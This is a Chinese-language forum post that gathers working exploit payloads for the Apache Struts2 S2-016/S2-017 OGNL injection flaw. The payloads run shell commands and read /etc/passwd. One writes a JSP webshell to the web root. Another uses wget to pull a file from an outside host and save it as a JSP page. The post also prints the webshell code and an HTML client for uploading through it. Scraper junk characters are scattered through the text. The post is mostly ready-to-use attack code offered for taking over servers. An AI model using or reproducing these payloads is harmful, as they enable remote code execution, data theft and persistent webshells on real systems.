Struts2 S2-016/S2-017漏洞执行代码

admin

大家都发了，，我就整理了一下。友情提示，自己小命比shell重要哦。。

喜欢就点一下感谢吧^_^

  b5 b: y4 W$ A4 U$ `3 ~带回显命令执行：
3 t" l- B9 q% c& P/ H! a
http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
- }! S( r9 D/ ~+ M( T5 B
- J# E6 b$ m: d4 ^0 v# R
# r8 v3 x4 K- P% V! W. }
- x" S4 h) S) I8 I- q
5 I2 h  h  l! M8 k. D/ Y
( j% A) H6 S, L
4 a! o% m! T9 d3 J
# }0 U9 I  N) {) k# g7 b1 @) n% \爆路径：
; s  J3 c% {! f5 f# C0 ?# K) w
http://www.example.com/struts2-b ... 8%29.close%28%29%7D




1 `. a# F8 Q/ ?* I
% s9 u6 m, n7 }0 D) A, C写文件：

( j+ _* S. }9 e2 `http://www.example.com/struts2-blank/example/X.action?redirect:${
9 g6 D3 p8 g7 n0 T
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),

%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
( h: j5 D- A9 k* N; q& D
% k5 X- p% {  `+ ~* C; anew+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
+ Z- N6 Z; ?/ u
! J+ K3 D. M, C' @}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
3 f& i" V; h' }6 c) u5 g; m9 \
  y1 o8 {" W: }

写入的文件内容：

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      

其实就是一个jsp的小马，需要客户端配合                                                                                 
9 \# J) f/ F* K5 |8 |" ]+ t6 \) Z
函数f是文件名，t是内容

8 Q+ E9 {8 L3 g2 n/ x, N2 d; s" {客户端：

1 ]9 V5 m( y5 G- M: a+ P( l3 _<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
3 Z/ D2 i' G$ ]* L  _7 [* t) J. d
<textarea name=t cols=120 rows=10 width=45>your code</textarea>

<center>
5 I1 f6 `( E& D6 |, V( {
. A9 b+ [8 E" E: y
+ t7 p4 d0 F0 q% b8 V% p* {
<input type=submit value="提交">
% C1 B) x7 X2 S
/ H1 I# s: Z* m* f" ?</form>
5 Q6 L; V% W4 |* c5 f$ y
就在当前目录建立一个fjp.jsp
8 ?& E  i. G! e* j' X* d
shell：http://www.example.com/struts2-blank/example/fjp.jsp
0 {4 |# D, R) o. u+ m4 c
& X& Y+ Q/ n! k7 g- R1 n/ m, v) F% P2 f
/ f7 E! {! P6 ~2 e1 o/ I
还有@园长的一个客户端：
9 ?/ o! x" V* i$ U& I) U
<html>
, T) L5 G8 v$ t1 D2 @
" B0 O: T! ?4 M/ j1 V7 J<head>
! A6 N$ k. a: _+ r
<meta http-equiv="content-type" content="text/html;charset=utf-8">

3 J3 W; ~. ?, |" F4 E/ P/ s<title>jsp-园长</title>

! ]) z5 b* i/ Z- N  E9 Y. N% X) G</head>
# Q' n" o5 ~7 [& [; H+ }, a8 c5 }
1 o. C' W8 p( B. Z; }$ F  ]! ]- [<style>
* l: ~6 C- i2 Q
3 [& ^% D3 l+ Y7 c8 C.main{width:980px;height:600px;margin:0 auto;}

4 o* N" m  k3 q% X+ [.url{width:300px;}
0 b0 \" M% i* o
.fn{width:60px;}

/ I# z0 U& i" D4 J9 v8 a.content{width:80%;height:60%;}
7 d) F- D; A) w& y* B( B
8 ^2 w5 f) g* ]7 n4 p</style>

! K: q% }/ i3 m. E) i<script>
! b* A- |8 C4 j" |# H: i
  function upload(){

1 ]! _; C$ W" J/ k9 g) ~    var url = document.getElementById('url').value,
. Z7 \* ~; R- K5 Z$ O3 F7 H
1 a" a8 i. A" K4 c: _9 _* z. g      content = document.getElementById('content').value,
7 R9 Y6 O3 R: Z: @0 m5 H
0 b7 D9 m" Z* @# P. e1 q      fileName = document.getElementById('fn').value,

" T3 m" n& J0 s* ^1 |, S. r      form = document.getElementById('fm');

! t: d5 m! [0 L9 a+ z2 e, t    if(url.length == 0){
7 K; |# T$ N+ ?8 w
      alert("Url not allowd empty!");

      return ;
2 p  |+ A& m- Y! [+ p. O
/ Z3 ~/ y5 w2 }; f, U: y$ _1 t5 I3 O; G    }

    if(content.length == 0){

      alert("Content not allowd empty!");
9 B' r) Z. F4 D" |/ @% O
      return ;

    }

    if(fileName.length == 0){

      alert("FileName not allowd empty!");

      return ;

    }

    form.action = url;
1 H* p3 S+ n( S
    form.submit();

  }

$ |1 o2 _+ [/ K- j# x. ^</script>
9 g2 ~- D) t, X: U
9 |" S- Q2 H* x5 Q% E6 o3 v" c<body>

<div class="main">

/ X- a* C* R4 Z) A5 M  <form id="fm" method="post">  
6 e+ h# d! v3 c/ P- i7 |) V
    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  
- c; S& E. u. X* B  h
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  
! _4 {' n. a" y+ [- P& J/ q# ~
) D" p! Z" j7 L6 J, T    <a href="javascript:upload();">Upload</a>
3 k1 Y+ i3 v, A3 M8 D7 E; t  k; n

* c& o5 S3 g8 Q
    <textarea id="content" class="content" name="t" ></textarea>

  </form>

' K; S2 t( r  ~: o; d</div>

' E( ]9 _5 A8 O! J</body>

</html>
/ i2 @1 l+ P% [0 D' X0 U# `9 H

. H/ I/ h% `5 e8 M: F2 f: v% s
还有@X发的一个wget的getshell
4 N, i: _2 x$ S* d
" Q6 N8 T- H) c1 t?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}

)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
复制代码